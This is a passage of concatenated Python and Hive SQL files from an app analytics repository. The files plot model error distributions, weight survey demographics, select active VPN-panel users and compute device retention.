for x,g in error_distribution.groupby(groupby_order):
if count % n_plots == 1:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.xaxis.set_major_formatter(ticks)
ax.yaxis.set_major_formatter(ticks)
for col_cnt, key in enumerate(pred_cols):
g[pd.notnull(g['proportion_of_error[{}]'.format(key)])].sort('abs_error[{}]'.format(key)).\
set_index('abs_error[{}]'.format(key))['proportion_of_error[{}]'.format(key)].\
plot(style='-', figsize=(15,10), fontsize=20, c=col_list[col_cnt % nlevels],
alpha = 1.0 / float( len(pred_cols) / nlevels - col_cnt / nlevels),
lw = 2*(col_cnt / nlevels + 2) )
legend_list.append('-'.join(x) + '_{}'.format(key))
if 'abs_error[original]' in error_distribution.columns:
g[pd.notnull(g['proportion_of_error[original]'])].sort('abs_error[original]').\
set_index('abs_error[original]')['proportion_of_error[original]'].\
plot(style='--', figsize=(15,10), lw=7, fontsize=20, alpha=0.8,
c= 'orange')
legend_list.append('-'.join(x) + '_original')
plt.ylabel('proportion of apps', fontsize=20)
plt.xlabel('absolute percentage error', fontsize=20)
plt.legend(legend_list, loc = 'best', prop={'size':20})
plt.xlim(cutoff)
plt.title( x[0] + ' ' + x[1] + ' : ' + title_template, fontsize=24, y=1.04)
if count % n_plots == 0:
plt.show()
legend_list = []
count += 1
def cdf_with_topapps(self, data, modelname='Supervised Learning', baseline=None, TOPAPP_Bucket=4, pred_col='pred', xlim=100):
cols = seaborn.color_palette('deep')
_data_ = data.copy()
if pred_col:
_data_['abs_error[{}]'.format(pred_col)] = 100 * np.abs(_data_[pred_col] * 1.0 / _data_['Active Users'] - 1.0)
if baseline in _data_.columns:
_data_['abs_error[original]'] = 100 * np.abs(_data_[baseline] * 1.0 / _data_['Active Users'] - 1.0)
for n, g in _data_.groupby(['Device Type', 'Country']):
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111)
g = g.sort('Active Users', ascending=False)
title = 'Learning Model = %s, %s, %s, Cumulative Top Apps'%(modelname, n[0], n[1])
TOPAPPS = xrange(g.shape[0]/TOPAPP_Bucket, g.shape[0]+1, g.shape[0]/TOPAPP_Bucket)
for cnt, topapp in enumerate(TOPAPPS):
g_capped = g[:topapp].copy()
if pred_col:
g_capped = g_capped.sort('abs_error[{}]'.format(pred_col), ascending=True)
p2, = ax.plot(g_capped['abs_error[{}]'.format(pred_col)],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
color=cols[cnt%len(cols)], lw = 3,
label='Total Apps={}'.format(topapp))
if baseline in _data_.columns:
g_capped = g_capped.sort('abs_error[original]', ascending=True)
p2, = ax.plot(g_capped['abs_error[original]'],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
linestyle='--', color='orange', lw = 3,
label='mydm_v1'.format(topapp))
ax.legend(loc=4, fontsize=15)
plt.title(title, fontsize=14, y=1.02)
plt.xlim(0,xlim)
fmt = '%0.0f%%' # Format you want the ticks, e.g. '40%'
yticks = mtick.FormatStrFormatter(fmt)
ax.xaxis.set_major_formatter(yticks)
ax.yaxis.set_major_formatter(yticks)
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.ylabel('% of Apps', fontsize=15)
plt.xlabel('Relative Error %', fontsize=15)
plt.show()
def cdf_with_topapps_v2(self, data, modelname='Supervised Learning', baseline=None, TOPAPP_Bucket=4, pred_col='pred', xlim=100):
cols = seaborn.color_palette('deep')
_data_ = data.copy()
if pred_col:
_data_['abs_error[{}]'.format(pred_col)] = 100 * np.abs( _data_[pred_col] * 1.0 / _data_['Active Users'] - 1.0)
if baseline in _data_.columns:
_data_['abs_error[original]'] = 100 * np.abs( _data_[baseline] * 1.0 / _data_['Active Users'] - 1.0)
for n, g in _data_.groupby(['Device Type', 'Country']):
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111)
g = g.sort('Active Users', ascending=False)
title = 'Learning Model = %s, %s, %s, Top Apps Buckets'%(modelname, n[0], n[1])
prev_topapp = 0
TOPAPPS = xrange(g.shape[0]/TOPAPP_Bucket, g.shape[0]+1, g.shape[0]/TOPAPP_Bucket)
for cnt, topapp in enumerate(TOPAPPS):
g_capped = g[prev_topapp:topapp].copy()
if pred_col:
g_capped = g_capped.sort('abs_error[{}]'.format(pred_col), ascending=True)
p2, = ax.plot(g_capped['abs_error[{}]'.format(pred_col)],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
color=cols[cnt%len(cols)], lw = 3,
label='topapp={} - {}'.format(prev_topapp, topapp))
if baseline in _data_.columns:
g_capped = g_capped.sort('abs_error[original]', ascending=True)
p2, = ax.plot(g_capped['abs_error[original]'],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
linestyle='--', color=cols[cnt%len(cols)], lw = 3,
label='mydm_v1_topapp={} - {}'.format(prev_topapp, topapp))
ax.legend(loc=4)
prev_topapp = topapp
plt.title(title)
plt.xlim(0,xlim)
fmt = '%0.0f%%' # Format you want the ticks, e.g. '40%'
yticks = mtick.FormatStrFormatter(fmt)
ax.xaxis.set_major_formatter(yticks)
ax.yaxis.set_major_formatter(yticks)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error %')
plt.show()
def model_training_v2(self, model, x_training, y_training, baseline=None, model_name='Supervised Learning', log=True):
percentile_range = range(25,101,25)
assert x_training.shape[0] == baseline.shape[0], ValueError
prediction = cross_val_predict(model, x_training, y_training, cv=5)
model.fit(x_training, y_training)
fig, ax = plt.subplots(figsize=(12,10))
ax.scatter(y_training, prediction, label='Rincon Prediction', s=60)
if baseline is not None:
ax.scatter(y_training, baseline, color='red', label='MyDM_v1.1', s=60)
ax.plot([y_training.min(), y_training.max()], [y_training.min(), y_training.max()], 'k--', lw=4)
ax.set_xlabel('GA Measured', fontsize=15)
ax.set_ylabel('MyDM or Rincon Predicted', fontsize=15)
if log:
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_title('{} Overall Active Users Predicted v.s. Measured'.format(model_name),
fontsize=20, y=1.02)
plt.tick_params(axis='both', labelsize=14)
ax.legend(loc=4)
fig.show()
perc = np.percentile(y_training, percentile_range)
prev_mau = y_training.min()
for index, mau in enumerate(perc):
fig, ax = plt.subplots(figsize=(8,6))
tmp = pd.DataFrame(dict(truth=y_training, pred=prediction))
tmp = tmp[(tmp['truth']>=prev_mau)
& (tmp['truth']<=mau)]
ax.scatter(tmp['truth'], tmp['pred'],
label='Rincon Prediction', s=45)
del tmp
if baseline is not None:
tmp = pd.DataFrame(dict(truth=y_training, pred=baseline))
tmp = tmp[(tmp['truth']>=prev_mau)
& (tmp['truth']<=mau)]
ax.scatter(tmp['truth'], tmp['pred'],
color='red', label='MyDM_v1.1', s=45)
del tmp
ax.plot([prev_mau, mau], [prev_mau, mau], 'k--', lw=4)
ax.set_xlabel('GA Measured', fontsize=10)
ax.set_ylabel('MyDM or Rincon Predicted', fontsize=10)
if log:
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_title('%s Active Users Predicted v.s. Measured with MAU in %i%% percentile' % (model_name, percentile_range[index]), y=1.02)
ax.legend(loc=4)
fig.show()
prev_mau = mau
return prediction
<file_sep>/survey/201503/lib/survey_utility.py
__author__ = 'jjanssen'
import numpy as np
import pandas as pd
'''
in: list of tuples that represent bins
out: list of dicts containing lower and upper bound and bin name info
'''
def generate_bins(list_of_bin_tuples, type):
dict_list = []
for t in list_of_bin_tuples:
lower_bound = t[0]
upper_bound= t[1]
bin_name = str(lower_bound) + '-' + str(upper_bound)
if(t[1] == -1):
upper_bound = np.inf
bin_name = str(lower_bound) + '+'
bin_info = {'min' : lower_bound, 'max' : upper_bound, str(type)+'_bin' : bin_name}
dict_list.append(bin_info)
return dict_list
'''
in: list of genders, a list of list of dicts containing lower and upper bound and bin name info
out: list of dicts containing lower and upper bound and bin name info and gender info
'''
def generate_gender_age_bin(gender_list, age_bins):
dict_list = []
for d in age_bins:
for g in gender_list:
age_gender_bin = d.copy()
age_gender_bin['gender'] = g
dict_list.append(age_gender_bin)
return dict_list
'''
in: list of dicts containing lower and upper bound and bin name info and gender info
in: list with population numbers for gender and age_buckets
'''
def generate_gender_age_population_df(population_list, age_gender_bins):
dict_list = []
for index, d in enumerate(age_gender_bins):
d['population_size'] = population_list[index]
dict_list.append(d)
result = pd.DataFrame(data=dict_list)
result.drop(labels=['max','min'], axis=1, inplace=True)
return result
'''
in:
df: dataframe containing survey information
demografic: column name of the demografic
weighting: indication meaning result should be weigted using column 'Weight'
survey: if 'Q4' different column names apply
os_list: list of Operating systems of devices
device_list: list of devices
IF BOTH os_list % device_list are empty, result consists of result for whole population, else split by device and OS
out:
dataframes containing distribution of demografic in absolute numbers or percentage
'''
def calc_distribution_demografic(df, demografic, os_list, device_list, weighting=False, survey=''):
demografic_list = df[demografic].unique().tolist()
demografic_list.sort()
result_cnt = pd.DataFrame(data=demografic_list, columns=[demografic])
result_pct = pd.DataFrame(data=demografic_list, columns=[demografic])
if (len(os_list) == 0 and len(device_list) == 0):
if(weighting == False):
device_os_result = df[[demografic]]
device_os_result['count'] = 1
else:
device_os_result = df[[demografic, 'Weight']]
device_os_result['count'] = 1 * device_os_result['Weight']
device_os_result = device_os_result.drop(labels='Weight', axis=1)
total = device_os_result['count'].count()
device_os_result = device_os_result.groupby(by=demografic).sum()
device_os_result.reset_index(inplace=True)
device_os_result['pct'] = device_os_result['count'] / total * 100
device_os_result['pct'] = np.round(device_os_result['pct'], decimals=2)
pct_name = demografic +'_population_pct'
count_name = demografic +'_population_count'
result_pct[[pct_name]] = device_os_result[['pct']]
result_cnt[[count_name]] = device_os_result[['count']]
elif(len(os_list) > 0 and len(device_list) > 0):
for o in os_list:
for d in device_list:
if (survey == 'Q4'):
if(d == 'phone'):
col_name_1 = 'os_primary_phone'
col_name_2 = 'os_phone'
device_os_result = df[(df[col_name_1] == o) |(df[col_name_2] == o)][[demografic]]
elif(d == 'tablet'):
col_name = 'os_tablet'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
else:
if(d == 'phone'):
col_name = 'os_primary_phone'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
elif(d == 'tablet'):
col_name = 'os_primary_tablet'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
if(weighting == False):
device_os_result['count'] = 1
else:
device_os_result['count'] = device_os_result['Weight']
device_os_result = device_os_result.drop(labels='Weight', axis=1)
total = device_os_result['count'].count()
device_os_result = device_os_result.groupby(by=demografic).sum()
device_os_result.reset_index(inplace=True)
device_os_result['pct'] = device_os_result['count'] / total * 100
device_os_result['pct'] = np.round(device_os_result['pct'], decimals=2)
pct_name = demografic +'_'+ o +'_' + d + '_pct'
count_name = demografic +'_'+ o +'_' + d + '_count'
result_pct[[pct_name]] = device_os_result[['pct']]
result_cnt[[count_name]] = device_os_result[['count']]
return result_cnt, result_pct
'''
in:
df: dataframe containing survey information
weighting: indication meaning result should be weigted using column 'Weight'
survey: if 'Q4' different column names apply
os_list: list of Operating systems of devices
device_list: list of devices
Only applicable if ethnicity is split in columnsm column name should contain substing 'ethni'
IF BOTH os_list % device_list are empty, result consists of result for whole population, else split by device and OS
out:
dataframes containing distribution of ethnicity in absolute numbers or percentage
'''
def calc_distribution_ethnicity(df, os_list, device_list, weighting=False):
result_pct = pd.DataFrame()
result_cnt = pd.DataFrame()
# find all columns about ethnicity
if (len(os_list) == 0 and len(device_list) == 0):
ethnicity_columns = []
for c in df.columns.values.tolist():
if 'ethni' in c:
ethnicity_columns.append(c)
selection = df[ethnicity_columns].astype(float)
selection['sum'] = selection.sum(axis=1)
if(weighting == False):
selection[ethnicity_columns] = selection[ethnicity_columns].div(selection['sum'], axis=0)
else:
selection[ethnicity_columns] = selection[ethnicity_columns].div(selection['sum'], axis=0)
selection = selection.mul(df['Weight'], axis=0)
os_device_result = pd.DataFrame()
os_device_result['cnt'] = selection[ethnicity_columns].T.sum(axis=1)
os_device_result['pct'] = selection[ethnicity_columns].T.sum(axis=1) / len(selection) *100
os_device_result.reset_index(inplace=True)
os_device_result['ethnicity'] = os_device_result['index']
pct_name = 'ethnicity_population_pct'
count_name = 'ethnicity_population_count'
result_pct['ethnicity'] = os_device_result['ethnicity']
result_cnt['ethnicity'] = os_device_result['ethnicity']
result_pct[[pct_name]] = os_device_result[['pct']]
result_cnt[[count_name]] = os_device_result[['cnt']]
else:
for o in os_list:
for d in device_list:
ethnicity_columns = []
for c in df.columns.values.tolist():
if 'ethni' in c:
ethnicity_columns.append(c)
if(d == 'phone'):
col_name = 'os_primary_phone'
selection = df[df[col_name] == o]
elif(d == 'tablet'):
col_name = 'os_primary_tablet'
selection = df[df[col_name] == o]
selection = selection[ethnicity_columns]
selection['sum'] = selection.sum(axis=1)
selection[ethnicity_columns] = selection[ethnicity_columns].div(selection['sum'], axis=0)
os_device_result = pd.DataFrame()
os_device_result['cnt'] = selection[ethnicity_columns].T.sum(axis=1)
os_device_result['pct'] = selection[ethnicity_columns].T.sum(axis=1) / len(selection) *100
os_device_result.reset_index(inplace=True)
os_device_result['ethnicity'] = os_device_result['index']
if (len(result_pct) == 0):
result_pct['ethnicity'] = os_device_result['ethnicity']
result_cnt['ethnicity'] = os_device_result['ethnicity']
pct_name = 'ethnicity' +'_'+ o +'_' + d + '_pct'
cnt_name = 'ethnicity' +'_'+ o +'_' + d + '_cnt'
result_pct[pct_name] = np.round(os_device_result['pct'], decimals=2)
result_cnt[cnt_name] = np.round(os_device_result['cnt'], decimals=2)
return result_cnt, result_pct
'''
in:
df: dataframe containing survey results
columns: columnsnames indicating that an respondent own a device
os_list: list of Operating systems of devices
weight: boolean indicator if weighting is needed
out:
dataframe containing (weigted) device count per respondent
'''
def split_os_nth_device(df, columns, os_list, weight=False):
if(weight):
weights = df.Weight
# get full range of columns we're interested in
df = df[columns]
for c in columns:
# create new columns for each n-th device per OS
for o in os_list:
column_name = c + '_' + str(o)
df[column_name] = df[df[c] == o][c]
# drop orignal columns
df.drop(labels=columns, axis=1, inplace=True)
# replace values by 1 and nan's by 0
df = df.applymap(lambda x: 0 if str(x) == 'nan' else 1)
# weight if needed
if(weight==True):
df = df.mul(weights, axis=0)
return df
'''
in:
df: dataframe containing survey results
group_columns: columns that need to be preserved to do an group by operation on
stack_columns: columns that need to be merged into one column
new_column_name: name of the new column
out:
dataframe containing group_columns and new_column_name
'''
def column_stacker(df, group_columns, stack_columns, new_column_name):
#iterate over columns, pick groupcolumns + columns, append
result = pd.DataFrame()
for s in stack_columns:
stack_frame = df[group_columns + [s]]
stack_frame.rename(columns={s:new_column_name}, inplace=True)
result = result.append(stack_frame, ignore_index=True)
return result
def calc_share_ratio(df, device, agebins, group_list):
# give appropriate device name to the columns for age and gender
age_select = ['age_first_using_%s','age_second_using_%s', 'age_third_using_%s','age_fourth_using_%s']
gender_select = ['gender_first_using_%s','gender_second_using_%s', 'gender_third_using_%s','gender_fourth_using_%s']
for index, item in enumerate(age_select): age_select[index] = item % device
for index, item in enumerate(gender_select): gender_select[index] = item % device
# select correct columns to stack age & gender for nth devices
df_age_gender = df[group_list + age_select + gender_select]
df_age_stacked = column_stacker(df_age_gender, group_list, age_select, new_column_name='shared_age')
df_gender_stacked = column_stacker(df_age_gender, group_list, gender_select, new_column_name='shared_gender')
df_age_stacked['shared_gender'] = df_gender_stacked['shared_gender']
df_both_stacked = df_age_stacked.apply(bin_gen_age, axis=1)
df_both_stacked['ones'] = 1
# count total number of people shared to per participant bucket
bucket_member_count = df_both_stacked[group_list + ['ones']][~df_both_stacked.age_gender_bin.isnull()].groupby(by=group_list).sum()
# pivot over 'group_list' sum over dummy column 'ones'
shared_bucket_count = df_both_stacked.pivot_table(values='ones',
index=group_list, columns = ['age_gender_bin'], aggfunc=[sum])
shared_bucket_count.columns = shared_bucket_count.columns.droplevel(level=0)
shared_bucket_count.reset_index(inplace=True)
# calculate total & pct for each age bucket
shared_bucket_count['total'] = shared_bucket_count.sum(axis=1, numeric_only=True)
shared_bucket_count[agebins] = shared_bucket_count[agebins].div(shared_bucket_count.total, axis=0)
shared_bucket_count[agebins] = np.round(shared_bucket_count[agebins]*100, decimals=2)
shared_bucket_count[agebins] = shared_bucket_count[agebins].fillna(value=0.0)
shared_bucket_count = shared_bucket_count[group_list+agebins+['total']]
shared_bucket_count['age_gender_bin'] = shared_bucket_count.gender.str.slice(0,1) + ' : ' + shared_bucket_count.age_bin
shared_bucket_count.drop(group_list, axis=1, inplace=True)
shared_bucket_count = shared_bucket_count.reindex_axis(sorted(shared_bucket_count.columns), axis=1)
return shared_bucket_count
def calc_share_freq(df, device, os, group_list):
app_share_columns = ['app_usage_first_using_%s','app_usage_second_using_%s', 'app_usage_third_using_%s',
'app_usage_fourth_using_%s']
OS_device_columns = ['os_primary_phone', 'os_secondary_phone','os_tertiary_phone', 'os_quaternary_phone']
# give appropriate device name to the columns for age and gender
for index, item in enumerate(app_share_columns): app_share_columns[index] = item % device
# iterate over OS_device_columns, if OS == iOS, select app_share_columns + group_list
app_share = pd.DataFrame()
for idx, c in enumerate(OS_device_columns):
os_nth_device = df[df[c] == os][group_list + [app_share_columns[idx]]]
app_share = app_share.append(os_nth_device)
# stack usage columns
stacked_freq = column_stacker(app_share, group_list, app_share_columns, 'app_usage_phone')
# calculate pct of sharers
sharers = stacked_freq[stacked_freq.app_usage_phone.str.get(0).notnull()]
non_sharers = stacked_freq[stacked_freq.app_usage_phone.str.get(0).isnull()]
share_pct = float(len(sharers)) / float(len(stacked_freq))
# sum num of users by group_list, calculate pct per bin
sharers['ones'] =1
sharers_freq_sum = sharers.groupby(by=group_list + ['app_usage_phone']).sum()
sharers_freq_sum.reset_index(inplace=True)
sharers_freq_sum = sharers_freq_sum.pivot_table(values='ones',index=group_list, columns = ['app_usage_phone'], aggfunc=[sum])
sharers_freq_sum.columns = sharers_freq_sum.columns.droplevel(level=0)
sharers_freq_sum['total'] = sharers_freq_sum.sum(axis=1, numeric_only=True)
column_list = list(set(sharers_freq_sum.columns.values.tolist()) - set(['total']))
sharers_freq_sum[column_list] = sharers_freq_sum[column_list].div(sharers_freq_sum.total, axis=0)
sharers_freq_sum[column_list] = sharers_freq_sum[column_list] * 100
plot_title = 'Sharing frequency in pct per gender / age bin for ' + device + ' ' + os + ' , % sharers: ' + "%.2f" % (share_pct * 100)
return sharers_freq_sum, sharers_freq_sum[colum_list].plot(kind='bar', figsize=(20,6), title = plot_title)
def calc_weigted_n_in_household_using(df, type):
new_column_name = 'weighted_n_in_household_using'
columns_name = 'n_in_household_using_' + type
df[new_column_name] = 0.0
for index, r in df.iterrows():
if(r[columns_name] == 0.0):
r[new_column_name] = r.Weight
else:
r[new_column_name] = r[columns_name] * r.Weight
return df<file_sep>/aa_au_model/lib/select_final_users.py
import pandas as pd
import datetime
def get_users_connected_paused(connection, pause):
"""
1540 timestamp
this function creates data frame that contains per day if a user has been active and if it has been using pause
required input data frames:
connection & pause, both as imported using import_data.import_data()
:param connection:
:param pause:
:return:
"""
### create date range per user between min and max active date
agg_function = {'start_at_datetime': 'min',
'end_at_datetime': 'max'}
connection_user_min_max = connection.groupby('device_id', as_index=False).agg(agg_function)
connection_user_min_max = pd.melt(connection_user_min_max, id_vars=['device_id'], value_vars=agg_function.keys(), value_name='date')
connection_user_min_max.set_index('date', inplace = True)
dates_device = connection_user_min_max.groupby('device_id').resample('1d', how='count').reset_index()[['device_id','date']]
dates_device['date_plus_one'] = dates_device.date.apply(lambda x: x + datetime.timedelta(days=1))
dates_devices_connection = pd.merge(dates_device, connection, on='device_id')
### active or not per day per user
dates_devices_connection['active'] = (dates_devices_connection.start_at_datetime >= dates_devices_connection.date) & (dates_devices_connection.end_at_datetime < dates_devices_connection.date_plus_one)
device_connection_per_day = pd.DataFrame(dates_devices_connection.groupby(['device_id','date']).active.max())
### another option is (only shows active dates, so no incative days):
# active_new = connection[['device_id','start_date','end_date']].drop_duplicates().set_index('device_id').stack().reset_index()[['device_id',0]].drop_duplicates()
### create date range per user between min and max pause date
pause_user_min_max = pause.groupby('device_id', as_index=False).agg(agg_function)
pause_user_min_max = pd.melt(pause_user_min_max, id_vars=['device_id'], value_vars=agg_function.keys(), value_name='date')
pause_user_min_max.set_index('date', inplace = True)
pause_dates_device = pause_user_min_max.groupby('device_id').resample('1d', how='count').reset_index()[['device_id','date']]
pause_dates_device['date_plus_one'] = pause_dates_device.date.apply(lambda x: x + datetime.timedelta(days=1))
dates_devices_paused = pd.merge(pause_dates_device, pause, on='device_id')
### pause or not per day per user
dates_devices_paused['paused'] = (dates_devices_paused.start_at_datetime >= dates_devices_paused.date) & (dates_devices_paused.end_at_datetime < dates_devices_paused.date_plus_one)
device_paused_per_day = pd.DataFrame(dates_devices_paused.groupby(['device_id','date']).paused.max())
### merge pause & connect data
pause_and_connect = pd.merge(device_connection_per_day, device_paused_per_day, left_index=True, right_index=True, how='left')
pause_and_connect.reset_index(inplace=True)
return pause_and_connect
def select_final_users(date_start_to_evaluate, date_end_to_evaluate, pause_and_connect, session, nr_of_days_to_check_before, nr_of_days_to_check_after, all_users_us):
"""
1540 timestamp
required input data frames:
- pause_and_connect as generated using get_users_connected_paused()
- session as imported using import_data.import_data() for getting the countries
note that input data frames should contain nr_of_days_to_check_before days prior to the first day to evaluate and nr_of_days_to_check_after days after the last day to evaluate
nr_of_days_to_check_before and nr_of_days_to_check_after can be both 0 as well, in that case, a user is evaluated as active if it is using vpn that day and has not used pause
all_users_us if True, countries are not assessed, but set to US for all users
"""
import pandas as pd
import datetime
dates = pd.date_range(start=date_start_to_evaluate,end=date_end_to_evaluate)
final_selection_of_users = pd.DataFrame()
for day_to_evaluate_datetime in dates:
### first select dates for current date to evaluate
days_to_check_before = day_to_evaluate_datetime - datetime.timedelta(days=nr_of_days_to_check_before)
days_to_check_after = day_to_evaluate_datetime + datetime.timedelta(days=nr_of_days_to_check_after + 1)
day_to_evaluate_date = datetime.date(day_to_evaluate_datetime.year, day_to_evaluate_datetime.month, day_to_evaluate_datetime.day)
days_to_check_before_date = datetime.date(days_to_check_before.year, days_to_check_before.month, days_to_check_before.day)
days_to_check_after_date = datetime.date(days_to_check_after.year, days_to_check_after.month, days_to_check_after.day)
pause_and_connect[(pause_and_connect.date >= days_to_check_before) &
(pause_and_connect.date < days_to_check_after)]
#######
#######
### get good devices
# first remove devices that used pause on evaluated day
potential_devices = pd.DataFrame(pause_and_connect[(pause_and_connect.date == day_to_evaluate_datetime) &
(pause_and_connect.paused != True)]['device_id'])
# select all records from pause_and_connect between nr_of_days_to_check_before evaluated day and nr_of_days_to_check_after evaluated day
potential_devices_before_after = pd.merge(pause_and_connect[(pause_and_connect.date >= days_to_check_before) &
(pause_and_connect.date < days_to_check_after)],
potential_devices,
on='device_id')
# select devices from potential_devices_before_after that were active before evaluated date
active_devices_before = pd.DataFrame(potential_devices_before_after[(potential_devices_before_after.date < day_to_evaluate_datetime) &
(potential_devices_before_after.active)].device_id.unique(),
columns=['device_id'])
# select devices from potential_devices_before_after that were active after evaluated date
active_devices_after = pd.DataFrame(potential_devices_before_after[(potential_devices_before_after.date > day_to_evaluate_datetime) &
(potential_devices_before_after.active)].device_id.unique(),
columns=['device_id'])
# select devices from that were active before and after evaluated date (combine active_devices_before & active_devices_after)
active_devices_before_after = pd.merge(active_devices_before,
active_devices_after,
on='device_id')
# merge active_devices_before_after with potential_devices.
# this way only devices get selected that were active before and after the evaluated date.
# this makes sure that the first and last day of activity are never taken into account
# the only exception to this rule is when nr_of_days_to_check_after = 0 and/or nr_of_days_to_check_before = 0
if nr_of_days_to_check_before == 0 & nr_of_days_to_check_after == 0:
good_devices_on_evaluated_date = pd.DataFrame(pause_and_connect[(pause_and_connect.date == day_to_evaluate_datetime) &
(pause_and_connect.paused != True) &
(pause_and_connect.active == True)]['device_id'])
else:
good_devices_on_evaluated_date = pd.merge(potential_devices,
active_devices_before_after,
on='device_id')
### finalize selection of users including the country they have to be assigned to per day
if all_users_us == True:
final_selection_of_users_day = good_devices_on_evaluated_date
final_selection_of_users_day['country'] = 'US'
final_selection_of_users_day['date'] = day_to_evaluate_date
final_selection_of_users = final_selection_of_users.append(final_selection_of_users_day, ignore_index=True)
else:
### assess country per user based on location in session data frame
country_devices = session[['startdate','device_id','country']].drop_duplicates()
country_devices = country_devices[country_devices.country.isnull() == False]
users_on_date_to_evaluate = country_devices[country_devices.startdate == day_to_evaluate_date]
countries_per_user_on_date_to_evaluate = pd.merge(users_on_date_to_evaluate,
users_on_date_to_evaluate.groupby('device_id').country.count().reset_index(),
on='device_id')
# if a user is active in one country, then determination of country per device is straightforward:
selected_users_country = countries_per_user_on_date_to_evaluate[countries_per_user_on_date_to_evaluate.country_y == 1][['startdate','device_id','country_x']]
selected_users_country = pd.merge(selected_users_country, good_devices_on_evaluated_date, on='device_id')
selected_users_country.columns = [['startdate','device_id','country']]
# devices not using vpn for a day are don't have a country for that day,
# therefore look at first session before and first after if no sessions on day that is evaluated
country_devices_for_date = country_devices[(country_devices.startdate >= days_to_check_before_date) &
(country_devices.startdate < days_to_check_after_date)]
good_devices_on_evaluated_date_and_countries = pd.merge(good_devices_on_evaluated_date, users_on_date_to_evaluate, on='device_id', how='left')
good_devices_on_evaluated_date_and_nr_countries = pd.DataFrame(good_devices_on_evaluated_date_and_countries.groupby('device_id').country.count())
### if days before and after are not taken into account for seeing if a user is active or not, this is not done for assessing the country either
if nr_of_days_to_check_before == 0 & nr_of_days_to_check_after == 0:
final_selection_of_users_day = pd.merge(good_devices_on_evaluated_date_and_countries, pd.DataFrame(good_devices_on_evaluated_date_and_nr_countries[good_devices_on_evaluated_date_and_nr_countries.country == 1].index), on='device_id')[['device_id','country']]
### if days before and after are > 0, than for the assessment of countries per user this is also taken into account
else:
no_country_devices = pd.DataFrame(good_devices_on_evaluated_date_and_nr_countries[good_devices_on_evaluated_date_and_nr_countries.country == 0].reset_index()['device_id'])
no_country_devices_before_and_after = pd.merge(no_country_devices, country_devices, on='device_id')
no_country_devices_before_and_after = no_country_devices_before_and_after[no_country_devices_before_and_after.country.isnull() == False]
max_date_before = country_devices[(country_devices.startdate < day_to_evaluate_date) &
(country_devices.startdate >= days_to_check_before_date)].groupby('device_id').startdate.max().reset_index()
latest_country_before = pd.merge(no_country_devices_before_and_after,
max_date_before,
on=['device_id','startdate']).sort('device_id')
min_date_after = country_devices[(country_devices.startdate > day_to_evaluate_date) &
(country_devices.startdate < days_to_check_after_date)].groupby('device_id').startdate.min().reset_index()
first_country_after = pd.merge(no_country_devices_before_and_after,
min_date_after,
on=['device_id','startdate']).sort('device_id')
nr_countries_first_day_after = first_country_after.groupby('device_id').country.count().reset_index()
nr_countries_latest_day_before = latest_country_before.groupby('device_id').country.count().reset_index()
first_single_country_after = pd.merge(first_country_after, nr_countries_first_day_after[nr_countries_first_day_after.country == 1], on='device_id')
latest_single_country_before = pd.merge(latest_country_before, nr_countries_latest_day_before[nr_countries_latest_day_before.country == 1], on='device_id')
countries_right_before_and_after = pd.merge(latest_single_country_before, first_single_country_after, on='device_id')
countries_right_before_and_after = countries_right_before_and_after[countries_right_before_and_after.country_x_x == countries_right_before_and_after.country_x_y][['device_id','country_x_x']]
countries_right_before_and_after.columns = ['device_id','country']
final_selection_of_users_day = countries_right_before_and_after.append(selected_users_country[selected_users_country.country.isnull() == False][['device_id','country']],
ignore_index=True)
final_selection_of_users_day['date'] = day_to_evaluate_date
final_selection_of_users = final_selection_of_users.append(final_selection_of_users_day, ignore_index=True)
return final_selection_of_users
<file_sep>/aa_au_model/hive_ql/ad_device_retention.sql
DROP TABLE IF EXISTS ad_devices_in_period;
CREATE TABLE ad_devices_in_period AS
SELECT
v.device_id,
v.platform,
v.model,
v.type,
min(v.datestr) as enter_date
FROM
vpn_new_device_info v
WHERE
datestr >= '2014-10-23' and v.platform == 'iOS'
GROUP BY
v.device_id,
v.platform,
v.model,
v.type
;
DROP TABLE IF EXISTS ad_connections_per_day;
CREATE TABLE ad_connections_per_day AS
SELECT
v.device_id,
v.datestr
FROM
vpn_sample_data_connection_session v
GROUP BY
v.device_id,
v.datestr
;
DROP TABLE IF EXISTS ad_connections_min_date;
CREATE TABLE ad_connections_min_date AS
SELECT
v.device_id,
min(v.datestr) as enter_date
FROM
ad_connections_per_day v
JOIN
ad_devices_in_period d on d.device_id = v.device_id
GROUP BY
v.device_id
;
DROP TABLE IF EXISTS ad_connections_retentions_per_day;
CREATE TABLE ad_connections_retentions_per_day AS
SELECT
v.device_id,
v.datestr as active_date,
d.platform,
d.model,
d.type,
m.enter_date
FROM
ad_connections_per_day v
JOIN
ad_devices_in_period d on d.device_id = v.device_id
JOIN
ad_connections_min_date m on m.device_id = v.device_id
LEFT JOIN
vpn_sample_data_pause_resume_session p on p.device_id = v.device_id and p.datestr = v.datestr
WHERE
p.device_id is null
GROUP BY
v.device_id,
v.datestr,
d.platform,
d.model,
d.type,
m.enter_date
;
DROP TABLE IF EXISTS to_ds_ad;
CREATE TABLE to_ds_ad
(
device_id STRING,
active_date DATE,
platform STRING,
model STRING,
type STRING,
enter_date DATE
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/joep_vpn_android_churn_analysis/android_sessions_since_20141218/';
INSERT OVERWRITE TABLE to_ds_ad
select
device_id,
active_date,
platform,
model,
type,
enter_date
FROM
ad_connections_retentions_per_day
;<file_sep>/aa_au_model/hive_scripts/workflow/module/workflow.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import yaml
import os
import sys
import uuid
import redis
import time
import traceback
import datetime
from slugify import slugify
from Queue import PriorityQueue
from rq import Queue
from executor import Executor
from constants import Status, ONE_MONTH, ErrorNumber, STATUS_LABEL
